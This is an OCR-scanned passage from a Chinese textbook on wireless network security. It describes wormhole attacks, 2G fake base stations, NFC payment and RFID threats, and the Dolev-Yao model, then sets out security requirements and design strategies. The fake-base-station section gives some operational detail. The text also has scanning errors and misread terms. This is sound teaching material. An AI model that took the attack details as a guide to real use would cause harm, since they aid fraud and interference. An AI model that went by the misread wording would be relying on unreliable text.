也 可 能 之 间 将 消息 删除 而 是 目的 节点 接收 不 到 消息 ; 或 是 只 将 部 分 的 消息 传递 ， 而 是 目 
的 节点 得 不 到 所 有 的 信息 ; 即使 虫 洞 节点 将 所 有 的 消息 都 传递 给 了 目的 节点 ， 虫 洞 节点 
也 会 窃取 到 源 节点 和 目的 节点 直接 传递 消息 的 内 容 ， 之 后 可 以 将 此 内 容 报 告 给 发 起 攻击 
的 攻击 者 的 主机 ， 已 达到 窃取 的 目的 ， 所 以 由 此 看 来 虫 洞 攻击 是 一 种 危害 非常 严重 的 攻 
击 类 型 ， 能 够 使 整个 的 无 线 传感器 网 络 不 正常 的 工作 。 

@ 2G 伪 基 站 攻击 :“ 伪 基站 ” 即 假 基 站 ， 设 备 一 般 由 主机 和 笔记 本 电脑 组 成 ， 通 
过 短信 群发 器 、 短 信 发 信 机 等 相关 设备 能 够 搜 取 以 其 为 中 心 、 一 定 半径 范围 内 的 手机 卡 
信息 ， 通 过 伪装 成 运营 商 的 基站 ， 冒 用 他 人 手机 号 码 强 行 向 用 户 手 机 发 送 诈骗 、 广 告 
销 等 短信 息 。 伪 基站 设备 运行 时 ， 干 扰 和 屏蔽 一 定 范围 内 的 运营 商 信 号 ， 伪 基站 则 趁 着 
这 个 时 间 ， 搜 索 出 附近 的 手机 号 ， 并 将 短信 发 送 到 这 些 号 码 上 。 屏 蔽 运营 商 的 信号 ， 能 
持续 10s 一 20s， 短 信 推 送 完了 ， 对 方 手 机 才能 重新 搜索 到 信号 ， 用 户 手机 信号 被 强制 连 
接 到 该 设备 上 , 导致 手机 无 法 正常 使 用 运营 商 提供 的 服务 , 手机 用 户 一 般 会 暂时 脱 网 8 一 
12s 后 恢复 正常 ， 部 分 手机 则 必须 开关 机 才能 重新 入 网 。 此 外 ， 它 还 会 导致 手机 用 户 频 
繁 地 更 新 位 置 ， 使 得 该 区 域 的 无 线 网 络 资源 紧张 并 出 现 网 络 拥塞 现象 ， 影 响 用 户 的 正常 
通信 。 有 很 多 用 户 的 手机 不 能 自动 恢复 信号 ， 需 要 重启 。 伪 基站 能 把 发 送 号 码 显示 为 任 
意 号 码 ， 甚 至 是 邮箱 号 ，110 都 可 以 。 载 有 伪 基 站 的 车 行驶 只 要 以 不 高 于 60 km 的 时 速 ， 
可 以 有 效 向 周边 用 户 群发 短信 。 

NFC (NearFieldCommunication， 近 距离 无 线 通信 技术 ) 面临 特殊 威胁 攻击 : K 
用 第 三 方 支付 服务 提供 商 是 NFC 手机 实现 移动 支付 的 主要 形式 ， 其 体系 结构 可 以 用 图 
3-81 描述 。 整 个 系统 的 核心 是 NFC 手机 及 第 三 方 支付 平台 。 其 中 ，NFC 手机 是 存放 与 
用 户 相关 的 支付 凭证 、 安 全 密 钥 、 支 付 应 用 程序 和 提供 非 接触 通信 接口 ;移动 支付 服务 
器 为 第 三 方 支付 服务 的 提供 商 ， 主 要 为 用 户 发 放 支付 赁 证、 管理 用 户 账户 金额 、 为 商家 
提供 支付 接口 和 数字 证 书 等 。NFC 手机 中 的 安全 单元 如 果 受 损 ， 将 导致 移动 支付 无 法 正 
确 进 行 。NFC 在 线 移 动 支付 流程 描述 如 下 : 


图 3-81 NEC 手机 在 线 支付 系统 架构 
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图 3-82 NFC 手机 支付 系统 数据 流 图 


商家 NFCPOS 机 器 读 取 客 户 所 选 商品 信息 ， 生 成 商品 订单 ， 并 将 订单 信息 通过 


NEC 链 路 传递 给 用 户 手机 ; 
NFC 手机 验证 商家 的 证 书 ， 并 核对 订单 信息 ; 


订单 确认 之 后 ， 手 机 用 户 需 输 入 PIN 码 ， 验 证 通过 后 ， 向 移动 支付 平台 提交 支付 


请 求 ; 
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移动 支付 平台 验证 用 户 信息 ， 根 据 其 账户 金额 余额 确认 支付 请 求 的 有 效 性 ; 
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。 移动 支付 平台 将 支付 请 求 传 给 商家 ; 
。 商家 确认 交易 有 效 ， 交 易 完成 。 
为 了 更 详细 地 分 析 NEC 手机 完成 一 次 移动 支付 交易 的 具体 过 程 ， 需 对 NFC 手机 支 
付 系 统 的 支付 交易 构建 数据 流 图 。 首先 , 明确 移动 支付 业务 所 有 参与 方 , 主要 包括 : NFC 
手机 用 户 、 商 家 前 端 NFCPOS 机 、 商 家 后 台 服 务 器 、 第 三 方 支付 平台 、 移 动 运营 商 。 然 
后 ， 按 照 交易 流程 ， 分 析 NEC 手机 支付 交易 的 数据 流 图 如 图 3-82 tas. NFC 手机 在 线 
支付 应 用 场景 下 会 面临 如 下 特有 的 安全 威胁 : 
© NEC 手机 中 的 安全 单元 如 果 受 损 ， 将 导致 移动 支付 无 法 正确 进行 。 安 全 单元 的 损 
坏 可 能 是 硬件 故障 导致 ， 也 可 能 是 攻击 者 恶意 行为 导致 。 后 果 是 安全 模块 的 正常 
加 密 、 签 名 功能 无 法 启用 ， 将 导致 无 法 进行 证 书 的 验证 、 签 名 和 数据 的 加 解密 。 
由 于 硬件 故障 或 攻击 者 恶意 行为 导致 安全 单元 中 证 书信 息 损坏 或 丢失 , 但 是 其 他 
功能 接口 正常 。 后 果 是 导致 无 法 加 解密 数据 、 签 名 及 认证 ， 以 及 以 往 的 历史 加 密 
数据 或 交易 信息 无 法 使 用 。 
。 攻击 者 可 能 通过 在 用 户 手机 中 植 入 专门 的 恶意 软件 ， 如 一 些 手机 木马 软件 ， 使 得 
攻击 者 能 够 有 机 会 修改 用 户 订单 ， 或 者 将 以 往 订单 进行 重 发 ， 后 果 是 订单 完整 
性 被 破坏 ， 导 致 用 户 账户 损失 。 
攻击 者 可 能 通过 假冒 交易 方 的 身份 ， 伪 造 虚假 订单 ， 欺 骗 用 户 进行 交易 。 后 果 是 
虚假 订单 造成 用 户 经 济 损失 。 
攻击 者 能 够 劫持 商家 与 用 户 之 间 的 交易 会 话 ， 并 进一步 获取 用 户 的 支付 。 后 果 是 
交易 被 劫持 ， 进 而 导致 经 济 损失 。 
@) RFID (RadioFrequencyIdentification， 射 频 识 别 ) 面临 特殊 威胁 攻击 : RFID 系统 
的 层次 框架 体系 主要 由 “Tag-to-Reader” 和 后 台 系统 两 大 环节 组 成 ， 目 前 实际 存在 的 对 
于 RFID 系统 威胁 与 攻击 ， 基 本 都 是 通过 这 两 大 环节 中 存在 的 通信 安全 疏漏 而 形成 的 有 
针对 性 的 攻击 ， 这 两 种 针对 性 的 攻击 方式 为 :“Tag-to-Reader” 攻 击 〈 包 括 标签 编码 和 标 
签 认证 攻击 ) 和 后 台 攻 击 。 
。 在 针对 RFID 系统 中 标签 与 阅读 器 的 攻击 ， 从 攻击 形式 来 看 ， 主 要 有 两 种 : 一 种 
是 直接 攻击 系统 ， 也 称 作 物理 攻击 从 电子 通信 的 角度 对 RFID 系统 的 不 同 物理 位 
置 实施 的 攻击 。 例 如 在 使 用 RFID 阅读 器 的 工作 场所 使 用 大 功率 RF 电场 ， 在 电 
子 标签 内 的 电路 中 产生 超 负 荷 电 流 ， 从 而 使 标签 电路 烧 坏 ， 青 如 拒绝 服务 攻击 
(DoS) 攻击 ,也 称 淹没 攻击 ,攻击 者 可 以 通过 一 些 射频 信号 装置 短 时 间 内 向 阅读 
器 端 发 送 大 量 数据 信号 ， 导 致 RFID 系统 被 大 量 的 信号 所 淹没 ， 从 而 使 RFID 系 
统 告警 ， 丧 失 处 理 正 常数 据 的 能 力 ， 陷 入 停滞 状态 。 另 一 种 是 身份 欺骗 攻击 ， 因 
为 电子 标签 是 存储 一 定数 据 的 信息 源 ， 所 以 与 社会 工程 学 相关 的 安全 威胁 会 被 黑 
客 或 者 攻击 者 利用 ， 成 为 新 型 的 信息 化 犯罪 。 从 攻击 实施 的 位 置 上 看 ， 可 以 是 伪 
造 标签 ， 欺 骗 读 写 器 ， 从 而 将 非法 数据 信息 送 入 系统 ; 也 可 以 是 伪造 读 写 器 ， 能 
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够 在 用 户 不 被 觉察 的 情况 下 读 取 用 户 的 标签 信息 ， 窃 取 用 户 隐私 ; 还 可 以 通过 射 
频 设备 在 空中 截获 标签 与 阅读 器 之 间 的 通信 ， 从 而 利用 这 些 设 备 伪造 阅读 器 或 者 

电子 标签 ， 展 开 例如 嗅 探 、 标 签 追 踪 、 重 播 攻 击 等 多 种 具体 的 入 侵 方法 。 
。 针对 后 台 系统 的 攻击 ， 其 实质 上 都 是 代码 攻击 的 变种 。 威 胁 RFID 后 台 系 统 安全 
的 病毒 实际 上 只 能 以 代码 的 形式 存在 ， 并 从 一 开始 被 存放 的 标签 的 数据 区 向 后 端 
系统 传播 。 如 果 标 签 信息 中 带 有 病毒 或 攻击 代码 ，RFID 后 台 系统 若 不 能 提供 任 
何 免疫 机 制 和 查 杀 手段 ， 则 会 导致 病毒 代码 直接 进入 后 端 应 用 系统 中 。 针 对 射频 
ID 的 代码 攻击 目前 主要 有 两 种 形式 : 一 类 是 注入 攻击 〈 也 叫 脚本 漏洞 攻击 、 脚 本 
注入 攻击 、 代 码 注入 攻击 ); 一 类 是 数据 攻击 。 
基于 中 间 件 与 后 端 系统 通信 的 攻击 。REFID 系统 通过 使 用 JMS、SOAP 或 HTTP 
来 实现 中 间 件 和 后 端 之 间 的 通信 。 在 这 些 通信 方式 中 可 能 存在 几 种 攻击 形式 ， 如 
中 间 人 攻击 、 应 用 层 攻 击 和 TCP 重播 攻击 。 中 间 人 攻击 是 指 当 用 户 在 与 系统 通信 
时 ， 通 信 系统 被 攻击 者 监听 ， 以 盗 取 双方 有 效 的 通信 信息 。 当 计算 机 通信 处 于 网 
络 层 较 低层 次 时 ， 无 法 确定 正在 和 谁 交 换 数据 。 应 用 层 攻击 是 指 触 发 服务 器 操作 
系统 或 应 用 程序 的 一 个 错误 来 攻击 应 用 层 服 务 器 ， 从 而 使 攻击 者 获得 绕 过 常规 访 
问 控制 系统 的 能 力 。 攻 击 者 利用 这 种 系统 存在 的 各 种 不 足 ， 获 取 对 应 用 程序 、 系 
统 或 者 网 络 的 控制 权 。TCP 重播 攻击 指 的 是 ， 攻 击 者 使 用 嗅 探 器 获取 数据 包 ， 通 
过 解析 数据 包 窃 取 到 认证 信息 和 密码 数据 ， 窃 取 的 数据 可 被 重新 放 回 到 网 络 里 ， 
或 者 重播 发 送 。 
无 线 网 络 环境 的 Dolev-Yao 威胁 模型 : 1983 年 , Dolev 和 Yao 提出 了 一 个 威胁 模型 


是 用 于 安全 协议 验证 研究 并 且 使 用 最 为 广泛 的 一 个 安全 协议 攻击 者 模型 ， 它 界定 了 安全 
协议 攻击 者 的 行为 能 力 。 该 模型 将 安全 协议 本 身 与 安全 协议 具体 所 采用 的 密码 系统 分 开 ， 
在 假定 密码 系统 是 “完善 的 ”( 即 只 有 掌握 密 钥 的 主体 才能 理解 密 文 消息 ) 基础 上 讨论 安 
全 协议 本 身 的 正确 性 、 安 全 性 和 宛 余 性 等 问题 。 同 时 指出 ， 在 这 个 模型 中 ， 攻 击 者 的 知 
识 和 能 力 不 可 低估 ， 假 设 攻击 者 可 以 控制 整个 通信 网 ， 并 具有 如 下 特征 : 


. 
= 


本 以 窃听 所 有 经 过 网 络 的 消息 ; 

以 阻止 和 截获 所 有 经 过 网 络 的 消息 ; 

[以 存储 所 获得 或 自身 创造 的 消息 ; 

[以 根据 存储 的 消息 伪造 并 发 送 消息 ; 

J 以 作为 合法 的 主体 参与 协议 的 运行 。 

在 Dolev-Yao 威胁 模型 中 , 发 送 到 网 中 的 任何 消息 都 可 看 成 是 发 送 给 攻击 者 处 理 的 。 


z3 3 o z 


因而 从 网 络 接收 到 的 任何 消息 都 可 以 看 成 是 经 过 攻击 者 处 理 过 的 。 换 句 话 说， 可 以 认为 


td 


fi 者 已 经 完全 控制 了 整个 网 络 。 当 然 攻击 者 也 不 是 全 能 的 ， 也 有 一 些 攻 击 者 所 不 能 做 


的 事情 ， 具 体 包括 : 


。 攻击 者 不 能 猜 到 从 足够 大 的 空间 中 选 出 的 随机 数 ; 
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。 没有 正确 的 密 钥 ， 攻 击 者 不 能 由 给 定 的 密 文 恢复 出 明文 ， 对 于 完善 的 加 密 算法 ， 
攻击 者 也 不 能 从 给 定 的 明文 构造 出 正确 的 密 文 
。 攻击 者 不 能 求 出 私有 部 分 ， 比 如 ， 与 给 定 的 公 钥 相 匹配 的 私 钥 ; 
。 攻击 者 虽然 能 控制 计算 和 通信 环境 的 大 量 公 共 部 分 ， 但 一 般 不 能 控制 计算 环境 中 
的 许多 私有 区 域 ， 如 访问 离线 主体 的 存储 器 等 。 
3.5.2.2 无 线 网 络 安全 需求 

无 线 网 络 具有 易于 部 署 、 成 本 低廉 、 灵 活 方便 等 优势 ， 在 许多 应 用 领域 发 挥 了 重要 
人 作用。 迄今 为 止 ， 无线 网 络 已 经 与 人 类 生活 息息相关 密 不 可 分 ， 极 大 地 改善 了 人 类 生活 
质量 ， 并 且 成 为 人 类 探索 外 层 空 间 不 可 或 缺 的 关键 技术 。 早 期 的 无 线 网 络 由 于 应 用 范围 
过 于 单一 ， 对 安全 性 要 求 不 高 ， 随 着 无 线 网 络 应 用 范围 的 日 益 拓 宽 ， 人 们 对 相应 安全 性 
的 要 求 也 开始 不 断 提高 。 一 般 的 无 线 应 用 ， 例 如 个 人 通信 ， 要 求 基本 的 实体 认证 、 隐 私 
保护 和 数据 保密 业务 ， 更 高 级 的 应 用 ， 例 如 军事 、 医 疗 、 工 业 控 制 、 金 融 等 等 ， 则 对 安 
全 性 提出 了 更 为 严格 的 要 求 。 历 史上 曾经 不 止 一 次 的 发 生 过 因为 无 线 攻 击 导致 战争 失败 
的 案例 。 

与 有 线 网 络 相 比 ， 无 线 网 络 所 面临 的 安全 威胁 更 加 严重 。 所 有 常规 有 线 网 络 中 存在 
的 安全 威胁 和 隐患 都 依然 存在 于 无 线 网 络 中 ， 外 部 人 员 可 以 通过 无 线 网 络 绕 过 防火 墙 ， 
对 专用 网 络 进行 非 授权 访问 ;无 线 网 络 传输 的 信息 容易 被 窃取 、 算 改 和 插入 ; 无 线 网 络 
容易 受到 拒绝 服务 攻击 和 干扰 ， 内 部 员工 可 以 设置 无 线 网 卡 以 端 对 端 模式 与 外 部 员工 直 
接连 接 。 此 外 ， 无 线 网 络 的 安全 技术 相对 比较 新 ， 安 全 产品 还 比较 少 。 以 无 线 局 域 网 为 
例 ， 移 动 节点 、AP 等 每 一 个 实体 都 有 可 能 是 攻击 对 象 或 攻击 者 。 由 于 无 线 网 络 在 移动 
设备 和 传输 媒介 方面 的 特殊 性 ， 使 得 一 些 攻击 更 容易 实施 ， 对 无 线 网 络 安全 技术 的 研究 
比 有 线 网 络 的 限制 更 多 、 难 度 更 大 。 无 线 网 络 在 信息 安全 方面 有 着 与 有 线 网 络 不 同 的 特 
点 ， 具 体 表 现在 以 下 几 个 方面 : 

O 无 线 网 络 的 开放 性 使 得 更 容易 受到 恶意 攻击 : 无 线 链 路 使 得 网 络 更 容易 受到 从 
被 动 窍 听 到 主动 干扰 的 各 种 攻击 。 有 线 网 络 的 网 络 连接 是 相对 固定 的 , 具有 确定 的 边界 ， 
攻击 者 必须 物理 接 入 网 络 或 经 过 几 道 防线 ， 如 防火 墙 和 网 关 ， 才 能 进入 有 线 网 络 。 这 样 
通过 对 接 入 端口 的 管理 可 以 有 效 地 控制 非法 用 户 的 接 入 。 而 无 线 网 络 则 没有 一 个 明确 的 
防御 边界 ， 攻 击 者 可 能 来 自 四 面 八方 和 任意 节点 ， 每 个 节点 必须 面 对 攻击 者 的 直接 或 间 
接 的 攻击 。 无 线 网 络 的 这 种 开放 性 带 来 了 非法 信息 截取 、 未 授权 信息 服务 、 恶 意 注 入 信 
息 等 一 系列 的 信息 安全 问题 。 

@ 无 线 网 络 的 移动 性 使 得 安全 管理 难度 更 大 。 有 线 网 络 的 用 户 终端 与 接 入 设备 之 
间 通 过 线 缆 连 接 ， 终 端 不 能 在 大 范围 内 移动 ， 对 用 户 的 管理 比较 容易 。 而 无 线 网 络 终端 
不 仅 可 以 在 较 大 范围 内 移动 ， 而 且 还 可 以 跨 区 域 漫 游 ， 增 大 了 对 接 入 节点 的 认证 难度 ， 
如 移动 通信 网 络 中 的 接 入 认证 问题 。 这 意味 着 移动 节点 没有 足够 的 物理 防护 ， 从 而 易 被 
窃听 、 破 坏 和 劫持 。 攻 击 者 可 能 在 任何 位 置 通过 移动 设备 实施 攻击 ， 而 在 全 球 范 围 内 跟 
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踪 一 个 特定 的 移动 节点 是 很 难 做 到 的 ， 另 一 方面 ， 通 过 网 络 内 部 已 经 被 入 侵 的 节点 实施 
攻击 而 造成 的 破坏 更 大 ,更 难 检 测 到 ， 且 要 求 密码 安全 算法 能 抗 密 钥 泄露 , 抗 节点 妥协 。 
因此 ， 对 无 线 网 络 移动 终端 的 管理 要 困难 得 多 ， 无 线 网 络 的 移动 性 带 来 了 新 的 安全 管理 
问题 ， 移 动 节 点 及 其 体系 结构 的 安全 性 更 加 脆弱 。 

@ 无 线 网 络 动态 变化 的 拓扑 结构 使 得 安全 方案 的 实施 难度 更 大 。 有 线 网 络 具 有 固 
定 的 拓扑 结构 ， 安 全 技术 和 方案 容易 实现 。 而 在 无 线 网 络 环境 中 ， 动 态 的 、 变 化 的 拓扑 
结构 ， 缺 乏 集中 管理 机 制 ， 使 得 安全 技术 更 加 复杂 。 另 一 方面 ， 无 线 网 络 环境 中 做 出 的 
许多 决策 是 分 散 的 ， 而 许多 网 络 算法 必须 依赖 所 有 节点 的 共同 参与 和 协作 。 缺 乏 集中 管 
理 机 制 意味 着 攻击 者 可 能 利用 这 一 弱点 实施 新 的 攻击 来 破坏 协作 算法 。 

@ 无 线 网 络 传输 信号 的 不 稳定 性 带 来 无 线 通信 网 络 的 健壮 性 问题 。 有 线 网 络 的 传 
输 环境 是 确定 的 ， 信 号 质量 稳定 ， 而 无 线 网 络 随 着 用 户 的 移动 其 信道 特性 是 变化 的 ， 会 
受到 干扰 、 训 落 、 多 径 、 多 普 勒 频 移 等 多 方面 的 影响 ， 造 成 信号 质量 波动 较 大 ， 甚 至 无 
法 进行 通信 。 因 此 ， 无 线 网 络 传输 信道 的 不 稳定 性 带 来 了 无 线 通信 网 络 的 健壮 性 问题 。 

© 无 线 网 络 终端 设备 具有 与 有 线 网 络 终端 设备 不 同 的 特点 。 有 线 网 络 的 网 络 实体 
设备 ， 如 路 由 器 、 防 火 墙 等 一 般 都 不 能 被 攻击 者 物理 地 接触 和 到， 而 无 线 网 络 的 网 络 实体 
设备 ， 如 访问 点 CAP) 可 能 被 攻击 者 物理 地 接触 和 到， 因而 可 能 存在 假 的 AP。 无 线 网 络 
终端 设备 与 有 线 网 络 的 终端 (如 个 人 计算 机 〉 相 比 ， 具 有 计算 、 通 信 、 存 储 等 资源 受 限 
的 特点 ， 以 及 对 耗 电量 、 价 格 、 体 积 等 的 要 求 。 一 般 在 对 无 线 网 络 进行 安全 威胁 分 析 和 
安全 方案 设计 时 ， 需 要 考虑 网 络 节点 设备 的 这 些 特点 。 目 前 ， 网 络 终端 设备 按 计算 、 通 
信和 存储 性 能 可 分 为 智能 手机 、 平 板 电 脑 (笔记本 电脑 )、PDA、 车 载 电 脑 、 无 线 传 感 
器 节点 、RFID 标签 和 读 卡 器 等 。 这 些 网 络 节点 设备 通常 具有 以 下 特点 : 

。 网 络 终端 设备 的 计算 能 力 通常 较 弱 ; 

。 网 络 终端 设备 的 存储 空间 可 能 是 有 限 的 

。 网 络 终端 设备 的 能 源 是 由 电池 提供 的 ， 持 续 时 间 短 ; 

。 无 线 网 络 终端 设备 与 有 线 网 络 设备 相 比 更 容易 被 窃 、 丢 失 、 损 坏 等 。 

总 之 ， 无 线 网 络 的 脆弱 性 是 由 于 其 媒体 的 开放 性 、 终 端的 移动 性 、 动 态 变化 的 网 络 
拓扑 结构 、 协 作 算 法 、 缺 乏 集中 监视 和 管理 点 以 及 没有 明确 的 防线 造成 的 。 因 此 ， 在 无 
线 网 络 环境 中 ， 在 设计 实现 一 个 完善 的 无 线 网 络 系统 时 ， 除 了 考虑 在 无 线 传输 信道 上 提 
供 完善 的 移动 环境 下 的 多 业务 服务 平台 外 ， 还 必须 考虑 其 安全 方案 的 设计 ， 这 包括 用 户 
接 入 控制 设计 、 用 户 身份 认证 方案 设计 、 用 户 证 书 管 理 系统 的 设计 、 密 钥 协 商 及 密 钥 管 
理 方案 的 设计 等 等 。 其 中 保密 性 和 认证 技术 是 关键 。 
3.5.2.3 无线 网 络 安全 方案 设计 策略 

由 于 无 线 网 络 区 别 与 有 线 网 络 的 特性 ， 在 设计 其 安全 方案 时 应 同时 考虑 安全 性 、 效 
率 、 兼 容 性 、 可 扩展 性 和 用 户 的 可 移动 性 五 大 因素 。 特 别 是 对 于 多 种 类 型 网 络 共 存 、 结 
构 复 杂 的 无 线 网 络 系统 ， 该 五 大 因素 是 检验 其 安全 方案 的 相互 关联 、 影 响 、 且 密 不 可 分 
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的 重要 指标 。 在 设计 无 线 网 络 系统 的 安全 方案 时 ， 一 般 原 则 如 下 

D 分 析 对 系统 的 假设 和 约定 。 这 主要 指 对 网 络 终端 、 网 络 中 间 实 体 等 网 络 节点 系 
统 的 假设 与 约定 ， 通 常 包 括 对 网 络 中 各 相关 节点 的 计算 、 通 信 、 存 储 、 电 源 等 能 力 的 假 
设 。 相同 的 安全 问题 ,对 于 不 同 的 假设 和 约定 条 件 下 , 通常 导致 不 同 的 解决 方法 。 例如， 
网 络 终端 节点 的 计算 能 力 是 否 有 限制 , 如 RFID 和 传感器 节点 在 计算 能 力 上 是 有 区 别 的 ， 
E 够 部 署 和 执行 的 安全 算法 是 有 差异 的 ， 传 感 器 节点 上 一 般 采 用 轻 量 级 的 密码 算法 ， 如 
NTRU、TinyECC 等 , RFID 上 能 够 采用 的 加 密 算法 多 为 轻 量 级 分 组 算法 , 如 LBLock 等 。 

@ 分 析 网 络 的 体系 结构 ， 明 确 网 络 的 拓扑 结构 〈 星 形 、 网 状 、 分 层 树 状 、 单 跳 还 
是 多 跳 网 络 、 拓 扑 结构 是 否 变化 、 节 点 是 否 移动 、 节 点 移动 的 速度 范围 )、 通 信 类 型 ( 单 
播 、 组 播 、 广 播 等 )、 链 路 特征 参数 〈 带 宽 、 吞 吐 率 、 延 迟 )、 网 络 规模 〈 节 点 数量 、 网 
络 覆 盖 面 积 )、 业 务 数 据 类 型 语音、 数据 、 多 媒体 、 控 制 指令 ) 等 ， 以 及 网 络 的 异 构 性 
〈 多 种 形态 网 络 的 融合 ， 有 线 网 络 和 无 线 网 络 的 融合 )， 网 络 的 时 效 性 〈 是 临时 存在 的 还 
是 长 期 存在 的 )。 它 和 上 一 条 一 起 构成 了 设计 安全 方案 时 的 客观 约束 条 件 ， 例如， 网 络 拓 
扑 结构 往往 会 影响 路 由 安全 ， 节 点 移动 性 会 影响 身份 认证 ， 网 络 规模 会 影响 密 钥 管 理 ， 
业务 数据 类 型 会 影响 加 密 方式 等 。 这 些 条 件 也 会 影响 到 后 面 对 信 任 模型 和 敌手 模型 的 建 
模 。 例 如 ， 临 时 动态 的 网 络 通常 没有 可 信 第 三 方 ， 异 构 网 络 中 的 有 线 核心 网 部 分 是 否 存 
在 敌手 。 

© 分 析 网 络 的 业务 构成 (工作 流程 、 操 作 过 程 )， 涉 及 的 实体 (角色 )、 业 务 通信 
的 基本 内 容 等 ， 思 考 这 些 实体 和 通信 内 容 可 能 面临 的 安全 威胁 。 例 如 ， 网 络 的 业务 构成 
过 程 中 可 能 遭受 的 安全 威胁 ， 业 务 的 工作 流程 决定 了 需要 安全 保护 的 具体 通信 和 内容， 小 
及 的 实体 决定 了 协议 设计 中 的 交互 方 以 及 访问 控制 对 象 。 这 一 部 分 的 分 析 将 帮助 确定 具 
体 的 安全 威胁 ， 并 最 终 帮 助 确定 对 应 的 安全 需求 。 

@ 分 析 网 络 和 系统 中 的 信任 模型 ， 明 确 方案 涉及 的 相关 实体 和 通信 和 链 路 的 信任 程 
度 ， 即 通信 链 路 或 者 实体 是 可 信 、 半 可 信 还 是 不 可 信 的 ， 思 考 并 确定 安全 的 边界 。 信 任 
模型 中 半 可 信 的 一 个 例子 是 指 能 够 按照 协议 执行 相关 操作 ， 但 会 泄露 或 者 算 改 协议 通信 
的 内 容 。 某 些 不 可 信 的 敌手 可 能 不 按照 所 期 望 网 络 协议 的 方式 操作 ， 如 无 线 传 感 器 网 络 
中 的 Blackhole 攻击 、Greyhole 攻击 等 ， 这 时 需要 借助 非 密码 学 的 方法 ， 如 入 侵 检 测 、 
基于 信任 的 管理 等 机 制 等 。 

© 分 析 攻 击 网 络 和 系统 的 敌手 模型 : 是 内 部 还 是 外 部 攻击 ， 是 主动 还 是 被 动 攻击 ， 
思考 对 敌手 能 力 的 设 定 (固定 敌手 还 是 移动 敌手 ), 给 出 一 些 典 型 的 攻击 场景 ;以 及 对 这 
些 攻 击 可 能 导致 的 后 果 。 例 如 ， 在 无 线 传感器 网 络 中 特殊 的 攻击 方式 (如 Sybil 攻击 、 
HUD), RFID 网 络 中 的 隐私 破坏 问题 ， 针 对 网 络 编码 的 Pollution 攻击 等 等 。 如 果 对 
敌手 模型 的 假设 越 强 ， 则 安全 性 越 高 。 根 据 网 络 的 特征 来 分 析 ， 便 于 发 现 该 网 络 中 存在 
的 特有 的 安全 威胁 或 攻击 模式 ， 防 御 这 些 威胁 时 ， 通 用 的 网 络 安全 措施 可 能 不 能 奏效 ， 
这 便 需 要 根据 该 网 络 的 业务 特点 以 及 相关 系统 和 体系 结构 的 假设 与 约定 进行 安全 方案 设 
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计 。 发 现 新 的 攻击 方法 是 无 线 网 络 安全 研究 中 的 一 个 基本 创新 点 ， 其 创新 之 处 在 于 发 现 
并 提出 了 一 个 新 的 安全 问题 。 如 果 进 而 给 出 对 新 的 攻击 方法 的 安全 方案 则 构成 了 一 个 完 
整 的 创新 点 。 

© 从 存在 的 威胁 中 归纳 出 共性 的 安全 需求 。 通 常 的 思路 是 从 信息 安全 基本 安全 需 
求 的 角度 来 分 析 ， 包 括 保密 性 、 认 证 性 、 完 整 性 、 可 用 性 、 健 壮 性 〈 和 鲁 棒 性 、 容 侵 、 容 
错 、 抗 节点 妥协 、 可 靠 性 )、 隐 私 保护 、 信 任 管理 。 无 线 网 络 的 移动 性 特点 和 设备 的 不 可 
靠 性 特点 ， 使 得 隐私 保护 和 健壮 性 这 两 种 安全 需求 更 加 受到 重视 。 安 全 需求 一 般 是 与 具 
体 的 安全 威胁 相对 应 ， 也 可 能 是 将 安全 威胁 进行 归纳 后 的 涵盖 安全 威胁 的 最 小 集合 。 根 
据 现代 密码 学 的 要 求 ， 安 全 需要 通过 形式 化 的 方法 进行 严格 的 定义 ， 这 种 定义 往往 会 用 
到 可 忽略 函数 ， 概 率 多 项 式 图 灵机 ， 概 率 不 可 区 分 性 等 基本 概念 。 

@ 根据 前 面 步 骤 中 归纳 的 安全 需求 、 网 络 体系 结构 、 系 统 假设 确定 设计 需要 达到 
的 安全 目标 ， 以 及 实现 该 目标 时 要 满足 的 特性 ， 例 如 安全 算法 需要 满足 的 计算 量 上 限 ， 
存储 空间 上 限 ， 安 全 方案 对 容 侵 、 容 错 的 健壮 性 等 。 思 考 在 满足 网 络 体系 结 Rao 
想 条 件 下 如 何 满足 完全 需求 。 思 考 安全 防御 的 总 体 思路 ， 例 如 是 采用 密码 学 的 方法 ， 还 
是 采用 与 通信 网 络 和 计算 机 安全 相关 的 方法 ， 如 入 工 智能 的 方法 、 概 率 统计 的 方法 、 信 
任 评价 和 管理 的 方法 、 博 弈 论 的 方法 等 等 。 根 据 安全 目标 和 特性 、 网 络 体系 结构 、 系 统 
假设 等 最 后 确定 安全 体系 或 方案 。 根 据 实际 应 用 背景 对 相关 密码 学 机 制 进行 修改 和 应 用 ， 
这 一 设计 的 需要 考虑 的 要 点 是 : 对 安全 标准 技术 的 工程 应 用 选择 、 信 息 安全 技术 应 用 在 
实际 场合 的 合理 性 、 必 要 性 、 完 备 性 ， 以 及 对 历史 遗留 系统 的 兼容 性 ， 部 署 安全 方案 的 
成 本 代价 。 安 全 策略 和 机 制 则 更 多 地 从 网 络 管理 和 安全 管理 的 角度 考虑 实际 中 安全 方案 
的 性 能 和 可 用 性 。 

针对 以 上 原则 ， 在 设计 无 线 网 络 安全 方案 时 应 综合 采用 以 下 策略 : 

D 安全 策略 〈 移 动 终端 ): 

。 在 硬件 物理 防护 方面 ， 增 加 移动 平台 硬件 的 集成 度 ， 减 少 可 被 攻击 的 硬件 接口 ; 

增加 温度 、 电 流 、 电 压 检 测 电路 ， 防 止 物理 手段 攻击 ， 必 要 时 可 根据 安全 级 别 需 


要 自动 销毁 TPM 和 USIM 中 的 数据 ; 
。 在 硬件 平台 加 国 方面 ， 采 用 可 信 移 动 平 台 的 思想 ， 添 加 可 信和 启动 、 完 整 性 检验 和 
保护 存储 等 措施 ; 


。 在 操作 系统 加 固 方面 ， 采 用 可 满足 TMP 需要 的 可 信 操 作 系统 ， 支 持 域 隔离 、 混 
合式 访问 控制 和 远程 验证 等 安全 策略 ; 

。 在 应 用 程序 加 固 方面 ， 下 载 和 加 载 程序 时 进行 合法 性 校 验 ， 防 止 攻击 者 对 其 进行 
算 改 ， 并 减少 用 户 可 选择 的 不 安全 配置 选项 。 

(2) 效率 策略 : 

。 安全 协议 要 求 交互 的 消息 数目 尽量 少 ， 每 条 消息 的 长 度 尽量 短 ; 

。 需要 移动 终端 完成 的 任务 应 尽量 的 少 ， 以 减少 时 延 ; 
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。 协议 要 求 的 计算 能 力 要 具有 明显 的 非 对 称 性 ， 大 的 计算 负担 应 该 在 服务 网 络 端 完 
成 ， 从 而 进一步 减轻 移动 终端 的 负担 ; 

。 充分 利用 移动 终端 的 空闲 时 间 进 行 预计 算 和 预 认证 ; 

